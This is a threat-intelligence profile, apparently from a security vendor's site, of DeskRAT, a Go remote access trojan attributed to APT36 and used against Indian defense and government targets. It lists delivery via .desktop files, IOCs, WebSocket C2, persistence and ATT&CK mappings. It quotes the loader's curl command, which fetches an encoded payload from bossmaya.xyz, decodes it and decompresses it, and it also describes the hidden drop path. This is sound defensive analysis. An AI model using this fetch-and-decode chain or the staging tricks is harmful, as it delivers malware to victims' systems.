DeskRAT
DeskRAT is a Golang-based remote access trojan associated with Pakistan-linked Transparent Tribe/APT36 (also tracked as Mythic Leopard) and used in espionage campaigns targeting Indian government, military, defense-related, and other strategic entities. Reporting describes it primarily as a Linux-focused implant targeting BOSS Linux environments, though related reporting also references delivery via rogue PowerPoint Add-In files and mentions related Windows tooling/variants in the same campaign cluster.
Observed delivery includes spear-phishing and social engineering using malicious ZIP attachments or links, weaponized freedesktop .desktop launchers, and contract- or government-themed lures. One documented Linux chain used an oversized malicious .desktop file named MoD_letter_update.desktop that abused the Exec= field and a triple-decoding bash loader (base64, xxd -r -p, and base64) to fetch an ASCII85-encoded, bzip2-compressed ELF payload from bossmaya[.]xyz/download.php?file=client.txt, write it under /tmp/.wAhJmE-<8-hex>, and execute it. Other reporting states malicious Desktop files displayed decoy PDFs while retrieving payloads from modgovindia[.]com, and that campaigns also used ZIP archives or cloud-hosted archives.
The Linux DeskRAT payload has been described as a statically linked stripped Linux x86_64 Go executable built with Go 1.24.3, with SHA-256 d62ad76a9841e710ce783c4f8313f134a1e6a726eb5b441b9cd49c7ae14b251a and Go Build ID 1a8d3756d7be400949824cee9462fb2cbac79106. The binary reportedly leaked compile-time paths including D:/bossmaya/our/newlinuxblkul/client/main.go and C:/Users/hp/go/pkg/mod/, indicating cross-compilation from a Windows host. Dependencies observed in the sample include github.com/gorilla/websocket@v1.5.0 and github.com/google/uuid@v1.3.0.
DeskRAT establishes command-and-control over WebSockets. Reported infrastructure includes 85.137.249[.]224:8080/ws, with Host-header-routed domains chuchuchacha[.]shop, chuchuchacha[.]xyz, makiinindia[.]xyz, and makiinindia[.]online, as well as prior or related infrastructure at 85.137.249[.]243 and 45.90.97[.]211. Another campaign cluster used modgovindia[.]space:4000 for encrypted HTTP POST exfiltration in a related Linux variant. The C2 server was observed returning a JSON welcome frame containing the text "Welcome to Stealth Server."
Capabilities attributed to DeskRAT and closely related Linux variants include persistence, remote command execution, file browsing and file collection/exfiltration, additional payload execution, heartbeat/ping handling, and multiple persistence mechanisms such as systemd, cron, autostart, and .bashrc modification. Reporting also characterizes DeskRAT as supporting data exfiltration and deployment of additional payloads. The malware is part of Transparent Tribe/APT36’s broader cross-platform malware evolution and has been described alongside other family names used by the actor, including Crimson RAT, CapraRAT, ElizaRAT, Geta RAT, Ares RAT, and Poseidon.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Once executed, the malicious .desktop launcher initiates a heavily obfuscated shell-based infection chain involving staged payload retrieval, inline decoding routines, and deployment of a Golang-based ELF implant tracked in this report as DeskRAT.
Pakistan-Linked TransparentTribe APT Deploys AI-Assisted DeskRAT Malware Against India’s BOSS Linux Systems
The campaigns are characterized by the use of malware families like Geta RAT, Ares RAT, and DeskRAT...
Techniques & procedures
15 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniquesThe disclosure comes as details have emerged of a targeted phishing operation leveraging weaponized Linux .desktop files to target the Indian military infrastructure using contract-related lures associated with Indian-armored vehicle procurement operations.
The current lure is themed as Ministry of Defence procurement of indigenous trawl assemblies for T-72 and T-90 main battle tanks ... a plausible-enough artifact for a defense-contracting inbox to open without hesitation.
Execution
5 techniquesOnce executed, the malicious .desktop launcher initiates a heavily obfuscated shell-based infection chain involving staged payload retrieval, inline decoding routines, and deployment of a Golang-based ELF implant tracked in this report as DeskRAT.
"DeskRAT, is delivered via a rogue PowerPoint Add-In file that runs embedded macro to establish outbound communication with a remote server to fetch the malware."
curl ${YAiuradJ} ${JOsQTdyK} | python3 -c 'import base64,sys; sys.stdout.buffer.write(base64.a85decode(sys.stdin.read()))' | bzip2 -d
APT36 ... is running an active Linux-targeted campaign ... delivered through abuse of the freedesktop .desktop file format with a triple-encoded bash loader.
Stealth
3 techniquesThe DeskRAT payload's ASCII85+bzip2 delivery mechanism, the decoded triple-encoded bash loader ( base64 → xxd -r -p → base64 ) ...
The root of the infection chain is a 1.4 MB .desktop file, MoD_letter_update.desktop ... a 500 KB base64-encoded PNG icon (so the launcher displays a convincing document icon to the victim), and a much larger base64-encoded .pdf-looking block that's actually unused data
the client-side /tmp/.wAhJmE-<md5> randomized drop path ... The randomized drop path ( /tmp/.wAhJmE-<md5> ) and the dotfile prefix keep the payload hidden from ls without -a
Discovery
1 technique"Geta RAT supports various commands to collect system information, enumerate running processes..."
Command and Control
3 techniquesThe C2 protocol WebSocket ( ws:// over TCP/8080), gorilla/websocket implementation ... Sending a WebSocket upgrade ... all complete the handshake and receive a server-initiated JSON frame on connection
The command-and-control channel is a WebSocket endpoint on 85.137.249[.]224:8080/ws ... The agent's runtime behavior is: dial wss://<c2>:8080/ws , register with a UUIDv4 session identifier prefixed cxx- , send heartbeats, and handle RPC messages over the WebSocket channel.
Decoded, the command is plain: ... curl ... "https://" "bossmaya.xyz/download.php?file=client.txt" | python3 -c 'import base64,sys; sys.stdout.buffer.write(base64.a85decode(sys.stdin.read()))' | bzip2 -d
Other
1 techniqueIOCs tracked for this family
22 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
12 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A Golang-based ELF implant deployed through weaponized Linux .desktop files in a phishing campaign targeting Indian military and defense infrastructure via staged shell payload delivery.
A Go-based Linux stealer-RAT delivered via a malicious .desktop launcher and triple-encoded bash loader. The payload is fetched from a remote server, decoded from ASCII85 and bzip2, dropped into /tmp, then executed. The implant uses WebSocket C2 and is described as supporting standard RAT functions such as file listing, upload/download, command execution, heartbeats, and session registration.
Remote access trojan used in campaigns targeting Indian defense sector and government-aligned organizations; used to steal sensitive data and maintain access.
Golang RAT delivered via a malicious PowerPoint Add-In (macro-enabled) that establishes outbound communication to fetch the payload. Used for stealthy, persistent, long-term access in espionage campaigns.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.